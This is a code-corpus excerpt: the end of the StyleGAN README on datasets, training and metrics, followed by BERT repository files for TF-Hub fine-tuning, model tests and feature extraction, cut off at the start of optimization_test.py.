To obtain other datasets, including LSUN, please consult their corresponding project pages. The datasets can be converted to multi-resolution TFRecords using the provided [dataset_tool.py](./dataset_tool.py): ``` > python dataset_tool.py create_lsun datasets/lsun-bedroom-full ~/lsun/bedroom_lmdb --resolution 256 > python dataset_tool.py create_lsun_wide datasets/lsun-car-512x384 ~/lsun/car_lmdb --width 512 --height 384 > python dataset_tool.py create_lsun datasets/lsun-cat-full ~/lsun/cat_lmdb --resolution 256 > python dataset_tool.py create_cifar10 datasets/cifar10 ~/cifar10 > python dataset_tool.py create_from_images datasets/custom-dataset ~/custom-images ``` ## Training networks Once the datasets are set up, you can train your own StyleGAN networks as follows: 1. Edit [train.py](./train.py) to specify the dataset and training configuration by uncommenting or editing specific lines. 2. Run the training script with `python train.py`. 3. The results are written to a newly created directory `results/<ID>-<DESCRIPTION>`. 4. The training may take several days (or weeks) to complete, depending on the configuration. By default, `train.py` is configured to train the highest-quality StyleGAN (configuration F in Table 1) for the FFHQ dataset at 1024&times;1024 resolution using 8 GPUs. Please note that we have used 8 GPUs in all of our experiments. Training with fewer GPUs may not produce identical results &ndash; if you wish to compare against our technique, we strongly recommend using the same number of GPUs. Expected training times for the default configuration using Tesla V100 GPUs: | GPUs | 1024&times;1024 | 512&times;512 | 256&times;256 | | :--- | :-------------- | :------------ | :------------ | | 1 | 41 days 4 hours | 24 days 21 hours | 14 days 22 hours | | 2 | 21 days 22 hours | 13 days 7 hours | 9 days 5 hours | | 4 | 11 days 8 hours | 7 days 0 hours | 4 days 21 hours | | 8 | 6 days 14 hours | 4 days 10 hours | 3 days 8 hours | ## Evaluating quality and disentanglement The quality and disentanglement metrics used in our paper can be evaluated using [run_metrics.py](./run_metrics.py). By default, the script will evaluate the Fr&eacute;chet Inception Distance (`fid50k`) for the pre-trained FFHQ generator and write the results into a newly created directory under `results`. The exact behavior can be changed by uncommenting or editing specific lines in [run_metrics.py](./run_metrics.py). Expected evaluation time and results for the pre-trained FFHQ generator using one Tesla V100 GPU: | Metric | Time | Result | Description | :----- | :--- | :----- | :---------- | fid50k | 16 min | 4.4159 | Fr&eacute;chet Inception Distance using 50,000 images. | ppl_zfull | 55 min | 664.8854 | Perceptual Path Length for full paths in *Z*. | ppl_wfull | 55 min | 233.3059 | Perceptual Path Length for full paths in *W*. | ppl_zend | 55 min | 666.1057 | Perceptual Path Length for path endpoints in *Z*. | ppl_wend | 55 min | 197.2266 | Perceptual Path Length for path endpoints in *W*. | ls | 10 hours | z: 165.0106<br>w: 3.7447 | Linear Separability in *Z* and *W*. Please note that the exact results may vary from run to run due to the non-deterministic nature of TensorFlow. ## Acknowledgements We thank Jaakko Lehtinen, David Luebke, and Tuomas Kynk&auml;&auml;nniemi for in-depth discussions and helpful comments; Janne Hellsten, Tero Kuosmanen, and Pekka J&auml;nis for compute infrastructure and help with the code release.
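As a recap of the sub-network interface described in "Using pre-trained networks" above, the following sketch (not taken from the repository) performs the truncation trick manually. It assumes `Gs`, `np`, and `tflib` are available as in the earlier examples, and for simplicity it applies the same &psi; to every layer instead of using a cutoff:

```
# Map latents z to dlatents w with the mapping sub-network.
latents = np.random.RandomState(42).randn(4, Gs.input_shape[1])
dlatents = Gs.components.mapping.run(latents, None)          # [batch, layer, component]

# Truncate towards the average w: w' = w_avg + psi * (w - w_avg).
dlatent_avg = Gs.get_var('dlatent_avg')                      # [component]
psi = 0.7
dlatents = dlatent_avg + psi * (dlatents - dlatent_avg)

# Synthesize images from the truncated dlatents.
fmt = dict(func=tflib.convert_images_to_uint8, nchw_to_nhwc=True)
images = Gs.components.synthesis.run(dlatents, randomize_noise=False, output_transform=fmt)
```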
bert
eedf5716ce1268e56f0a50264a88cafad334ac61
File: run_classifier_with_tfhub.py # coding=utf-8 # Copyright 2018 The Google AI Language Team Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """BERT finetuning runner with TF-Hub.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import os import optimization import run_classifier import tokenization import tensorflow as tf import tensorflow_hub as hub flags = tf.flags FLAGS = flags.FLAGS flags.DEFINE_string( "bert_hub_module_handle", None, "Handle for the BERT TF-Hub module.") def create_model(is_training, input_ids, input_mask, segment_ids, labels, num_labels, bert_hub_module_handle): """Creates a classification model.""" tags = set() if is_training: tags.add("train") bert_module = hub.Module(bert_hub_module_handle, tags=tags, trainable=True) bert_inputs = dict( input_ids=input_ids, input_mask=input_mask, segment_ids=segment_ids) bert_outputs = bert_module( inputs=bert_inputs, signature="tokens", as_dict=True) # In the demo, we are doing a simple classification task on the entire # segment. # # If you want to use the token-level output, use # bert_outputs["sequence_output"] instead. output_layer = bert_outputs["pooled_output"] hidden_size = output_layer.shape[-1].value output_weights = tf.get_variable( "output_weights", [num_labels, hidden_size], initializer=tf.truncated_normal_initializer(stddev=0.02)) output_bias = tf.get_variable( "output_bias", [num_labels], initializer=tf.zeros_initializer()) with tf.variable_scope("loss"): if is_training: # I.e., 0.1 dropout output_layer = tf.nn.dropout(output_layer, keep_prob=0.9) logits = tf.matmul(output_layer, output_weights, transpose_b=True) logits = tf.nn.bias_add(logits, output_bias) probabilities = tf.nn.softmax(logits, axis=-1) log_probs = tf.nn.log_softmax(logits, axis=-1) one_hot_labels = tf.one_hot(labels, depth=num_labels, dtype=tf.float32) per_example_loss = -tf.reduce_sum(one_hot_labels * log_probs, axis=-1) loss = tf.reduce_mean(per_example_loss) return (loss, per_example_loss, logits, probabilities) def model_fn_builder(num_labels, learning_rate, num_train_steps, num_warmup_steps, use_tpu, bert_hub_module_handle): """Returns `model_fn` closure for TPUEstimator.""" def model_fn(features, labels, mode, params): # pylint: disable=unused-argument """The `model_fn` for TPUEstimator.""" tf.logging.info("*** Features ***") for name in sorted(features.keys()): tf.logging.info(" name = %s, shape = %s" % (name, features[name].shape)) input_ids = features["input_ids"] input_mask = features["input_mask"] segment_ids = features["segment_ids"] label_ids = features["label_ids"] is_training = (mode == tf.estimator.ModeKeys.TRAIN) (total_loss, per_example_loss, logits, probabilities) = create_model( is_training, input_ids, input_mask, segment_ids, label_ids, num_labels, bert_hub_module_handle) output_spec = None if mode == tf.estimator.ModeKeys.TRAIN: train_op = optimization.create_optimizer( total_loss, learning_rate, num_train_steps, num_warmup_steps, use_tpu) output_spec = 
tf.contrib.tpu.TPUEstimatorSpec( mode=mode, loss=total_loss, train_op=train_op) elif mode == tf.estimator.ModeKeys.EVAL: def metric_fn(per_example_loss, label_ids, logits): predictions = tf.argmax(logits, axis=-1, output_type=tf.int32) accuracy = tf.metrics.accuracy(label_ids, predictions) loss = tf.metrics.mean(per_example_loss) return { "eval_accuracy": accuracy, "eval_loss": loss, } eval_metrics = (metric_fn, [per_example_loss, label_ids, logits]) output_spec = tf.contrib.tpu.TPUEstimatorSpec( mode=mode, loss=total_loss, eval_metrics=eval_metrics) elif mode == tf.estimator.ModeKeys.PREDICT: output_spec = tf.contrib.tpu.TPUEstimatorSpec( mode=mode, predictions={"probabilities": probabilities}) else: raise ValueError( "Only TRAIN, EVAL and PREDICT modes are supported: %s" % (mode)) return output_spec return model_fn def create_tokenizer_from_hub_module(bert_hub_module_handle): """Get the vocab file and casing info from the Hub module.""" with tf.Graph().as_default(): bert_module = hub.Module(bert_hub_module_handle) tokenization_info = bert_module(signature="tokenization_info", as_dict=True) with tf.Session() as sess: vocab_file, do_lower_case = sess.run([tokenization_info["vocab_file"], tokenization_info["do_lower_case"]]) return tokenization.FullTokenizer( vocab_file=vocab_file, do_lower_case=do_lower_case) def main(_): tf.logging.set_verbosity(tf.logging.INFO) processors = { "cola": run_classifier.ColaProcessor, "mnli": run_classifier.MnliProcessor, "mrpc": run_classifier.MrpcProcessor, } if not FLAGS.do_train and not FLAGS.do_eval: raise ValueError("At least one of `do_train` or `do_eval` must be True.") tf.gfile.MakeDirs(FLAGS.output_dir) task_name = FLAGS.task_name.lower() if task_name not in processors: raise ValueError("Task not found: %s" % (task_name)) processor = processors[task_name]() label_list = processor.get_labels() tokenizer = create_tokenizer_from_hub_module(FLAGS.bert_hub_module_handle) tpu_cluster_resolver = None if FLAGS.use_tpu and FLAGS.tpu_name: tpu_cluster_resolver = tf.contrib.cluster_resolver.TPUClusterResolver( FLAGS.tpu_name, zone=FLAGS.tpu_zone, project=FLAGS.gcp_project) is_per_host = tf.contrib.tpu.InputPipelineConfig.PER_HOST_V2 run_config = tf.contrib.tpu.RunConfig( cluster=tpu_cluster_resolver, master=FLAGS.master, model_dir=FLAGS.output_dir, save_checkpoints_steps=FLAGS.save_checkpoints_steps, tpu_config=tf.contrib.tpu.TPUConfig( iterations_per_loop=FLAGS.iterations_per_loop, num_shards=FLAGS.num_tpu_cores, per_host_input_for_training=is_per_host)) train_examples = None num_train_steps = None num_warmup_steps = None if FLAGS.do_train: train_examples = processor.get_train_examples(FLAGS.data_dir) num_train_steps = int( len(train_examples) / FLAGS.train_batch_size * FLAGS.num_train_epochs) num_warmup_steps = int(num_train_steps * FLAGS.warmup_proportion) model_fn = model_fn_builder( num_labels=len(label_list), learning_rate=FLAGS.learning_rate, num_train_steps=num_train_steps, num_warmup_steps=num_warmup_steps, use_tpu=FLAGS.use_tpu, bert_hub_module_handle=FLAGS.bert_hub_module_handle) # If TPU is not available, this will fall back to normal Estimator on CPU # or GPU. 
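  # Note: the per-mode batch sizes are given to TPUEstimator itself rather than to the
  # input functions; the estimator forwards the active one to input_fn via params["batch_size"].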
estimator = tf.contrib.tpu.TPUEstimator( use_tpu=FLAGS.use_tpu, model_fn=model_fn, config=run_config, train_batch_size=FLAGS.train_batch_size, eval_batch_size=FLAGS.eval_batch_size, predict_batch_size=FLAGS.predict_batch_size) if FLAGS.do_train: train_features = run_classifier.convert_examples_to_features( train_examples, label_list, FLAGS.max_seq_length, tokenizer) tf.logging.info("***** Running training *****") tf.logging.info(" Num examples = %d", len(train_examples)) tf.logging.info(" Batch size = %d", FLAGS.train_batch_size) tf.logging.info(" Num steps = %d", num_train_steps) train_input_fn = run_classifier.input_fn_builder( features=train_features, seq_length=FLAGS.max_seq_length, is_training=True, drop_remainder=True) estimator.train(input_fn=train_input_fn, max_steps=num_train_steps) if FLAGS.do_eval: eval_examples = processor.get_dev_examples(FLAGS.data_dir) eval_features = run_classifier.convert_examples_to_features( eval_examples, label_list, FLAGS.max_seq_length, tokenizer) tf.logging.info("***** Running evaluation *****") tf.logging.info(" Num examples = %d", len(eval_examples)) tf.logging.info(" Batch size = %d", FLAGS.eval_batch_size) # This tells the estimator to run through the entire set. eval_steps = None # However, if running eval on the TPU, you will need to specify the # number of steps. if FLAGS.use_tpu: # Eval will be slightly WRONG on the TPU because it will truncate # the last batch. eval_steps = int(len(eval_examples) / FLAGS.eval_batch_size) eval_drop_remainder = True if FLAGS.use_tpu else False eval_input_fn = run_classifier.input_fn_builder( features=eval_features, seq_length=FLAGS.max_seq_length, is_training=False, drop_remainder=eval_drop_remainder) result = estimator.evaluate(input_fn=eval_input_fn, steps=eval_steps) output_eval_file = os.path.join(FLAGS.output_dir, "eval_results.txt") with tf.gfile.GFile(output_eval_file, "w") as writer: tf.logging.info("***** Eval results *****") for key in sorted(result.keys()): tf.logging.info(" %s = %s", key, str(result[key])) writer.write("%s = %s\n" % (key, str(result[key]))) if FLAGS.do_predict: predict_examples = processor.get_test_examples(FLAGS.data_dir) if FLAGS.use_tpu: # Discard batch remainder if running on TPU n = len(predict_examples) predict_examples = predict_examples[:(n - n % FLAGS.predict_batch_size)] predict_file = os.path.join(FLAGS.output_dir, "predict.tf_record") run_classifier.file_based_convert_examples_to_features( predict_examples, label_list, FLAGS.max_seq_length, tokenizer, predict_file) tf.logging.info("***** Running prediction*****") tf.logging.info(" Num examples = %d", len(predict_examples)) tf.logging.info(" Batch size = %d", FLAGS.predict_batch_size) predict_input_fn = run_classifier.file_based_input_fn_builder( input_file=predict_file, seq_length=FLAGS.max_seq_length, is_training=False, drop_remainder=FLAGS.use_tpu) result = estimator.predict(input_fn=predict_input_fn) output_predict_file = os.path.join(FLAGS.output_dir, "test_results.tsv") with tf.gfile.GFile(output_predict_file, "w") as writer: tf.logging.info("***** Predict results *****") for prediction in result: probabilities = prediction["probabilities"] output_line = "\t".join( str(class_probability) for class_probability in probabilities) + "\n" writer.write(output_line) if __name__ == "__main__": flags.mark_flag_as_required("data_dir") flags.mark_flag_as_required("task_name") flags.mark_flag_as_required("bert_hub_module_handle") flags.mark_flag_as_required("output_dir") tf.app.run() File: modeling_test.py # coding=utf-8 # 
Copyright 2018 The Google AI Language Team Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from __future__ import absolute_import from __future__ import division from __future__ import print_function import collections import json import random import re import modeling import six import tensorflow as tf class BertModelTest(tf.test.TestCase): class BertModelTester(object): def __init__(self, parent, batch_size=13, seq_length=7, is_training=True, use_input_mask=True, use_token_type_ids=True, vocab_size=99, hidden_size=32, num_hidden_layers=5, num_attention_heads=4, intermediate_size=37, hidden_act="gelu", hidden_dropout_prob=0.1, attention_probs_dropout_prob=0.1, max_position_embeddings=512, type_vocab_size=16, initializer_range=0.02, scope=None): self.parent = parent self.batch_size = batch_size self.seq_length = seq_length self.is_training = is_training self.use_input_mask = use_input_mask self.use_token_type_ids = use_token_type_ids self.vocab_size = vocab_size self.hidden_size = hidden_size self.num_hidden_layers = num_hidden_layers self.num_attention_heads = num_attention_heads self.intermediate_size = intermediate_size self.hidden_act = hidden_act self.hidden_dropout_prob = hidden_dropout_prob self.attention_probs_dropout_prob = attention_probs_dropout_prob self.max_position_embeddings = max_position_embeddings self.type_vocab_size = type_vocab_size self.initializer_range = initializer_range self.scope = scope def create_model(self): input_ids = BertModelTest.ids_tensor([self.batch_size, self.seq_length], self.vocab_size) input_mask = None if self.use_input_mask: input_mask = BertModelTest.ids_tensor( [self.batch_size, self.seq_length], vocab_size=2) token_type_ids = None if self.use_token_type_ids: token_type_ids = BertModelTest.ids_tensor( [self.batch_size, self.seq_length], self.type_vocab_size) config = modeling.BertConfig( vocab_size=self.vocab_size, hidden_size=self.hidden_size, num_hidden_layers=self.num_hidden_layers, num_attention_heads=self.num_attention_heads, intermediate_size=self.intermediate_size, hidden_act=self.hidden_act, hidden_dropout_prob=self.hidden_dropout_prob, attention_probs_dropout_prob=self.attention_probs_dropout_prob, max_position_embeddings=self.max_position_embeddings, type_vocab_size=self.type_vocab_size, initializer_range=self.initializer_range) model = modeling.BertModel( config=config, is_training=self.is_training, input_ids=input_ids, input_mask=input_mask, token_type_ids=token_type_ids, scope=self.scope) outputs = { "embedding_output": model.get_embedding_output(), "sequence_output": model.get_sequence_output(), "pooled_output": model.get_pooled_output(), "all_encoder_layers": model.get_all_encoder_layers(), } return outputs def check_output(self, result): self.parent.assertAllEqual( result["embedding_output"].shape, [self.batch_size, self.seq_length, self.hidden_size]) self.parent.assertAllEqual( result["sequence_output"].shape, [self.batch_size, self.seq_length, self.hidden_size]) self.parent.assertAllEqual(result["pooled_output"].shape, 
[self.batch_size, self.hidden_size]) def test_default(self): self.run_tester(BertModelTest.BertModelTester(self)) def test_config_to_json_string(self): config = modeling.BertConfig(vocab_size=99, hidden_size=37) obj = json.loads(config.to_json_string()) self.assertEqual(obj["vocab_size"], 99) self.assertEqual(obj["hidden_size"], 37) def run_tester(self, tester): with self.test_session() as sess: ops = tester.create_model() init_op = tf.group(tf.global_variables_initializer(), tf.local_variables_initializer()) sess.run(init_op) output_result = sess.run(ops) tester.check_output(output_result) self.assert_all_tensors_reachable(sess, [init_op, ops]) @classmethod def ids_tensor(cls, shape, vocab_size, rng=None, name=None): """Creates a random int32 tensor of the shape within the vocab size.""" if rng is None: rng = random.Random() total_dims = 1 for dim in shape: total_dims *= dim values = [] for _ in range(total_dims): values.append(rng.randint(0, vocab_size - 1)) return tf.constant(value=values, dtype=tf.int32, shape=shape, name=name) def assert_all_tensors_reachable(self, sess, outputs): """Checks that all the tensors in the graph are reachable from outputs.""" graph = sess.graph ignore_strings = [ "^.*/assert_less_equal/.*$", "^.*/dilation_rate$", "^.*/Tensordot/concat$", "^.*/Tensordot/concat/axis$", "^testing/.*$", ] ignore_regexes = [re.compile(x) for x in ignore_strings] unreachable = self.get_unreachable_ops(graph, outputs) filtered_unreachable = [] for x in unreachable: do_ignore = False for r in ignore_regexes: m = r.match(x.name) if m is not None: do_ignore = True if do_ignore: continue filtered_unreachable.append(x) unreachable = filtered_unreachable self.assertEqual( len(unreachable), 0, "The following ops are unreachable: %s" % (" ".join([x.name for x in unreachable]))) @classmethod def get_unreachable_ops(cls, graph, outputs): """Finds all of the tensors in graph that are unreachable from outputs.""" outputs = cls.flatten_recursive(outputs) output_to_op = collections.defaultdict(list) op_to_all = collections.defaultdict(list) assign_out_to_in = collections.defaultdict(list) for op in graph.get_operations(): for x in op.inputs: op_to_all[op.name].append(x.name) for y in op.outputs: output_to_op[y.name].append(op.name) op_to_all[op.name].append(y.name) if str(op.type) == "Assign": for y in op.outputs: for x in op.inputs: assign_out_to_in[y.name].append(x.name) assign_groups = collections.defaultdict(list) for out_name in assign_out_to_in.keys(): name_group = assign_out_to_in[out_name] for n1 in name_group: assign_groups[n1].append(out_name) for n2 in name_group: if n1 != n2: assign_groups[n1].append(n2) seen_tensors = {} stack = [x.name for x in outputs] while stack: name = stack.pop() if name in seen_tensors: continue seen_tensors[name] = True if name in output_to_op: for op_name in output_to_op[name]: if op_name in op_to_all: for input_name in op_to_all[op_name]: if input_name not in stack: stack.append(input_name) expanded_names = [] if name in assign_groups: for assign_name in assign_groups[name]: expanded_names.append(assign_name) for expanded_name in expanded_names: if expanded_name not in stack: stack.append(expanded_name) unreachable_ops = [] for op in graph.get_operations(): is_unreachable = False all_names = [x.name for x in op.inputs] + [x.name for x in op.outputs] for name in all_names: if name not in seen_tensors: is_unreachable = True if is_unreachable: unreachable_ops.append(op) return unreachable_ops @classmethod def flatten_recursive(cls, item): """Flattens 
(potentially nested) a tuple/dictionary/list to a list.""" output = [] if isinstance(item, list): output.extend(item) elif isinstance(item, tuple): output.extend(list(item)) elif isinstance(item, dict): for (_, v) in six.iteritems(item): output.append(v) else: return [item] flat_output = [] for x in output: flat_output.extend(cls.flatten_recursive(x)) return flat_output if __name__ == "__main__": tf.test.main() File: extract_features.py # coding=utf-8 # Copyright 2018 The Google AI Language Team Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Extract pre-computed feature vectors from BERT.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import codecs import collections import json import re import modeling import tokenization import tensorflow as tf flags = tf.flags FLAGS = flags.FLAGS flags.DEFINE_string("input_file", None, "") flags.DEFINE_string("output_file", None, "") flags.DEFINE_string("layers", "-1,-2,-3,-4", "") flags.DEFINE_string( "bert_config_file", None, "The config json file corresponding to the pre-trained BERT model. " "This specifies the model architecture.") flags.DEFINE_integer( "max_seq_length", 128, "The maximum total input sequence length after WordPiece tokenization. " "Sequences longer than this will be truncated, and sequences shorter " "than this will be padded.") flags.DEFINE_string( "init_checkpoint", None, "Initial checkpoint (usually from a pre-trained BERT model).") flags.DEFINE_string("vocab_file", None, "The vocabulary file that the BERT model was trained on.") flags.DEFINE_bool( "do_lower_case", True, "Whether to lower case the input text. Should be True for uncased " "models and False for cased models.") flags.DEFINE_integer("batch_size", 32, "Batch size for predictions.") flags.DEFINE_bool("use_tpu", False, "Whether to use TPU or GPU/CPU.") flags.DEFINE_string("master", None, "If using a TPU, the address of the master.") flags.DEFINE_integer( "num_tpu_cores", 8, "Only used if `use_tpu` is True. Total number of TPU cores to use.") flags.DEFINE_bool( "use_one_hot_embeddings", False, "If True, tf.one_hot will be used for embedding lookups, otherwise " "tf.nn.embedding_lookup will be used. 
On TPUs, this should be True " "since it is much faster.") class InputExample(object): def __init__(self, unique_id, text_a, text_b): self.unique_id = unique_id self.text_a = text_a self.text_b = text_b class InputFeatures(object): """A single set of features of data.""" def __init__(self, unique_id, tokens, input_ids, input_mask, input_type_ids): self.unique_id = unique_id self.tokens = tokens self.input_ids = input_ids self.input_mask = input_mask self.input_type_ids = input_type_ids def input_fn_builder(features, seq_length): """Creates an `input_fn` closure to be passed to TPUEstimator.""" all_unique_ids = [] all_input_ids = [] all_input_mask = [] all_input_type_ids = [] for feature in features: all_unique_ids.append(feature.unique_id) all_input_ids.append(feature.input_ids) all_input_mask.append(feature.input_mask) all_input_type_ids.append(feature.input_type_ids) def input_fn(params): """The actual input function.""" batch_size = params["batch_size"] num_examples = len(features) # This is for demo purposes and does NOT scale to large data sets. We do # not use Dataset.from_generator() because that uses tf.py_func which is # not TPU compatible. The right way to load data is with TFRecordReader. d = tf.data.Dataset.from_tensor_slices({ "unique_ids": tf.constant(all_unique_ids, shape=[num_examples], dtype=tf.int32), "input_ids": tf.constant( all_input_ids, shape=[num_examples, seq_length], dtype=tf.int32), "input_mask": tf.constant( all_input_mask, shape=[num_examples, seq_length], dtype=tf.int32), "input_type_ids": tf.constant( all_input_type_ids, shape=[num_examples, seq_length], dtype=tf.int32), }) d = d.batch(batch_size=batch_size, drop_remainder=False) return d return input_fn def model_fn_builder(bert_config, init_checkpoint, layer_indexes, use_tpu, use_one_hot_embeddings): """Returns `model_fn` closure for TPUEstimator.""" def model_fn(features, labels, mode, params): # pylint: disable=unused-argument """The `model_fn` for TPUEstimator.""" unique_ids = features["unique_ids"] input_ids = features["input_ids"] input_mask = features["input_mask"] input_type_ids = features["input_type_ids"] model = modeling.BertModel( config=bert_config, is_training=False, input_ids=input_ids, input_mask=input_mask, token_type_ids=input_type_ids, use_one_hot_embeddings=use_one_hot_embeddings) if mode != tf.estimator.ModeKeys.PREDICT: raise ValueError("Only PREDICT modes are supported: %s" % (mode)) tvars = tf.trainable_variables() scaffold_fn = None (assignment_map, initialized_variable_names) = modeling.get_assignment_map_from_checkpoint( tvars, init_checkpoint) if use_tpu: def tpu_scaffold(): tf.train.init_from_checkpoint(init_checkpoint, assignment_map) return tf.train.Scaffold() scaffold_fn = tpu_scaffold else: tf.train.init_from_checkpoint(init_checkpoint, assignment_map) tf.logging.info("**** Trainable Variables ****") for var in tvars: init_string = "" if var.name in initialized_variable_names: init_string = ", *INIT_FROM_CKPT*" tf.logging.info(" name = %s, shape = %s%s", var.name, var.shape, init_string) all_layers = model.get_all_encoder_layers() predictions = { "unique_id": unique_ids, } for (i, layer_index) in enumerate(layer_indexes): predictions["layer_output_%d" % i] = all_layers[layer_index] output_spec = tf.contrib.tpu.TPUEstimatorSpec( mode=mode, predictions=predictions, scaffold_fn=scaffold_fn) return output_spec return model_fn def convert_examples_to_features(examples, seq_length, tokenizer): """Loads a data file into a list of `InputBatch`s.""" features = [] for (ex_index, 
example) in enumerate(examples): tokens_a = tokenizer.tokenize(example.text_a) tokens_b = None if example.text_b: tokens_b = tokenizer.tokenize(example.text_b) if tokens_b: # Modifies `tokens_a` and `tokens_b` in place so that the total # length is less than the specified length. # Account for [CLS], [SEP], [SEP] with "- 3" _truncate_seq_pair(tokens_a, tokens_b, seq_length - 3) else: # Account for [CLS] and [SEP] with "- 2" if len(tokens_a) > seq_length - 2: tokens_a = tokens_a[0:(seq_length - 2)] # The convention in BERT is: # (a) For sequence pairs: # tokens: [CLS] is this jack ##son ##ville ? [SEP] no it is not . [SEP] # type_ids: 0 0 0 0 0 0 0 0 1 1 1 1 1 1 # (b) For single sequences: # tokens: [CLS] the dog is hairy . [SEP] # type_ids: 0 0 0 0 0 0 0 # # Where "type_ids" are used to indicate whether this is the first # sequence or the second sequence. The embedding vectors for `type=0` and # `type=1` were learned during pre-training and are added to the wordpiece # embedding vector (and position vector). This is not *strictly* necessary # since the [SEP] token unambiguously separates the sequences, but it makes # it easier for the model to learn the concept of sequences. # # For classification tasks, the first vector (corresponding to [CLS]) is # used as as the "sentence vector". Note that this only makes sense because # the entire model is fine-tuned. tokens = [] input_type_ids = [] tokens.append("[CLS]") input_type_ids.append(0) for token in tokens_a: tokens.append(token) input_type_ids.append(0) tokens.append("[SEP]") input_type_ids.append(0) if tokens_b: for token in tokens_b: tokens.append(token) input_type_ids.append(1) tokens.append("[SEP]") input_type_ids.append(1) input_ids = tokenizer.convert_tokens_to_ids(tokens) # The mask has 1 for real tokens and 0 for padding tokens. Only real # tokens are attended to. input_mask = [1] * len(input_ids) # Zero-pad up to the sequence length. while len(input_ids) < seq_length: input_ids.append(0) input_mask.append(0) input_type_ids.append(0) assert len(input_ids) == seq_length assert len(input_mask) == seq_length assert len(input_type_ids) == seq_length if ex_index < 5: tf.logging.info("*** Example ***") tf.logging.info("unique_id: %s" % (example.unique_id)) tf.logging.info("tokens: %s" % " ".join( [tokenization.printable_text(x) for x in tokens])) tf.logging.info("input_ids: %s" % " ".join([str(x) for x in input_ids])) tf.logging.info("input_mask: %s" % " ".join([str(x) for x in input_mask])) tf.logging.info( "input_type_ids: %s" % " ".join([str(x) for x in input_type_ids])) features.append( InputFeatures( unique_id=example.unique_id, tokens=tokens, input_ids=input_ids, input_mask=input_mask, input_type_ids=input_type_ids)) return features def _truncate_seq_pair(tokens_a, tokens_b, max_length): """Truncates a sequence pair in place to the maximum length.""" # This is a simple heuristic which will always truncate the longer sequence # one token at a time. This makes more sense than truncating an equal percent # of tokens from each, since if one sequence is very short then each token # that's truncated likely contains more information than a longer sequence. 
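# A minimal standalone sketch of the same longest-first truncation, on plain
# Python lists. `_truncate_pair_sketch` and the example data are hypothetical
# names used only for illustration.
def _truncate_pair_sketch(tokens_a, tokens_b, max_length):
  # Pop one token at a time from whichever list is currently longer until the
  # combined length fits the budget.
  while len(tokens_a) + len(tokens_b) > max_length:
    longer = tokens_a if len(tokens_a) > len(tokens_b) else tokens_b
    longer.pop()

# Example (made-up data):
#   a, b = list("abcdefgh"), list("xy")
#   _truncate_pair_sketch(a, b, 6)  # a -> ['a', 'b', 'c', 'd'], b -> ['x', 'y']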
while True: total_length = len(tokens_a) + len(tokens_b) if total_length <= max_length: break if len(tokens_a) > len(tokens_b): tokens_a.pop() else: tokens_b.pop() def read_examples(input_file): """Read a list of `InputExample`s from an input file.""" examples = [] unique_id = 0 with tf.gfile.GFile(input_file, "r") as reader: while True: line = tokenization.convert_to_unicode(reader.readline()) if not line: break line = line.strip() text_a = None text_b = None m = re.match(r"^(.*) \|\|\| (.*)$", line) if m is None: text_a = line else: text_a = m.group(1) text_b = m.group(2) examples.append( InputExample(unique_id=unique_id, text_a=text_a, text_b=text_b)) unique_id += 1 return examples def main(_): tf.logging.set_verbosity(tf.logging.INFO) layer_indexes = [int(x) for x in FLAGS.layers.split(",")] bert_config = modeling.BertConfig.from_json_file(FLAGS.bert_config_file) tokenizer = tokenization.FullTokenizer( vocab_file=FLAGS.vocab_file, do_lower_case=FLAGS.do_lower_case) is_per_host = tf.contrib.tpu.InputPipelineConfig.PER_HOST_V2 run_config = tf.contrib.tpu.RunConfig( master=FLAGS.master, tpu_config=tf.contrib.tpu.TPUConfig( num_shards=FLAGS.num_tpu_cores, per_host_input_for_training=is_per_host)) examples = read_examples(FLAGS.input_file) features = convert_examples_to_features( examples=examples, seq_length=FLAGS.max_seq_length, tokenizer=tokenizer) unique_id_to_feature = {} for feature in features: unique_id_to_feature[feature.unique_id] = feature model_fn = model_fn_builder( bert_config=bert_config, init_checkpoint=FLAGS.init_checkpoint, layer_indexes=layer_indexes, use_tpu=FLAGS.use_tpu, use_one_hot_embeddings=FLAGS.use_one_hot_embeddings) # If TPU is not available, this will fall back to normal Estimator on CPU # or GPU. estimator = tf.contrib.tpu.TPUEstimator( use_tpu=FLAGS.use_tpu, model_fn=model_fn, config=run_config, predict_batch_size=FLAGS.batch_size) input_fn = input_fn_builder( features=features, seq_length=FLAGS.max_seq_length) with codecs.getwriter("utf-8")(tf.gfile.Open(FLAGS.output_file, "w")) as writer: for result in estimator.predict(input_fn, yield_single_examples=True): unique_id = int(result["unique_id"]) feature = unique_id_to_feature[unique_id] output_json = collections.OrderedDict() output_json["linex_index"] = unique_id all_features = [] for (i, token) in enumerate(feature.tokens): all_layers = [] for (j, layer_index) in enumerate(layer_indexes): layer_output = result["layer_output_%d" % j] layers = collections.OrderedDict() layers["index"] = layer_index layers["values"] = [ round(float(x), 6) for x in layer_output[i:(i + 1)].flat ] all_layers.append(layers) features = collections.OrderedDict() features["token"] = token features["layers"] = all_layers all_features.append(features) output_json["features"] = all_features writer.write(json.dumps(output_json) + "\n") if __name__ == "__main__": flags.mark_flag_as_required("input_file") flags.mark_flag_as_required("vocab_file") flags.mark_flag_as_required("bert_config_file") flags.mark_flag_as_required("init_checkpoint") flags.mark_flag_as_required("output_file") tf.app.run() File: optimization_test.py # coding=utf-8 # Copyright 2018 The Google AI Language Team Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. 
